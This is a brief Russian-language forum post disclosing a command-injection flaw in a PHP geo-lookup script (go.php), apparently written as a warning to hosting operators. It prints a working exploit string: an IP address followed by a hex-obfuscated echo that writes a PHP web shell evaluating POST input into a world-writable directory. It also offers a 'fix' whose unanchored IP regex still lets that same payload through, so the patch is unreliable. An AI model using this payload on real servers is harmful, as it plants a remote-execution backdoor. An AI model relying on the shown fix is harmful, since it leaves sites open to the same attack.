Внимание всем!

Найдена уязвимость на хостерах использующих внешнюю гео! Есть реальные логи и примеры взлома!

Уязвимый код (go.php):

if((!isset($cc)||empty($cc))&&!$debug){
    $addr=explode(' ', shell_exec(''.$geoip_path.' '.$ip));
    $cc=str_replace(',', '', $addr[3]);
    $cc=trim($cc);
    $cn=$cc;
 }

Передача

фейка типа и запись файла в директорию с правами 777:

207.46.232.182;echo -e \x3c\x3f\x73\x65\x74\x5f\x74\x69\x6d\x65\x5f\x6c\x69\x6d\x69\x74\x28\x30\x29\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c\x61\x73\x68\x65\x73\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x29\x3b\x3f\x3e\xd\xa > ./archive/s.phpS

фикс:

if (preg_match("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/", $ip)) {
 if((!isset($cc)||empty($cc))&&!$debug){
    $addr=explode(' ', shell_exec(''.$geoip_path.' '.$ip));
    $cc=str_replace(',', '', $addr[3]);
    $cc=trim($cc);
    $cn=$cc;
 }
}

P.S. В Моде даный фикс так же внесет только с последнего билда!